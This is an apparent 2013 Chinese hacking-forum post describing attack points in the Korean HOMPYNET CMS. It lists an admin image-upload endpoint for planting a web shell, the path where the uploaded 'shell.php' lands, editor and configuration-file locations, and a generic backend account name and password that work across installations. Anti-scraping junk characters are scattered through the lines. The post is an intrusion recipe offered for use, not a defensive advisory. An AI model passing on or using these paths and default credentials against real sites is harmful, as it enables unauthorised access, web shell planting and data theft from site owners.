找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2070|回复: 0
打印 上一主题 下一主题

韩国HOMPYNET CMS漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:12:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
上传漏洞  :
: o) q' {9 W4 J: ^* m; T* t2 x8 l- r' _9 p; N
http://www.xxx.com/admin/image_a ... p;iname=&iform=
5 v4 Z% |! E. w
1 R5 D+ ~0 D; H9 H7 ghttp://www.xxx.com/admin/image_a ... p;iname=&iform=
6 b% y& y: G* n* [9 J: S
7 R/ p& o. j! I: C4 k4 h1 ?上传后路径:
) q5 l5 Y0 H2 H! T
( k' \7 q, X: l' [& [. q' u9 qhttp://www.xxx.com/bis_web_page/images/shell.php.en6 T; f5 l8 @( d5 j6 M

# }/ c6 M. z% b& S1 k; n编辑器:6 ?* J) l5 t$ J' b* c

1 M6 M' W8 ~; V7 V. P6 _( J% H: ghttp://www.xxx.com/admin/editor/SWE.php" G6 S! s4 v6 E/ t9 s6 G7 d' ~

8 n  S& ]4 I$ E7 N* L1 thttp://www.xxx.com/program/editor/SWE.php
% l/ v* I  b' X1 ]. Y) V. s% d3 Y( Z1 q  @( _
数据配置文件路径:
/ d2 `6 f7 p; D5 E  V
" N+ l$ Y  g, i% B( rhttp://www.xxx.com/m_config/DATA/g_setting.php
+ Z: Z! K3 a/ D. K, [8 @# p0 T3 i! f1 P! e( d$ ?" [; r# |
此程序通用后台账号 :gamsiw  php99! y/ c! U. e4 A8 I4 ^, ^! T
7 L1 m9 N& P3 G( g* W  g  Z
# D( i( d$ A4 x
5 d2 F. S* ]1 p9 S7 n% [1 G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表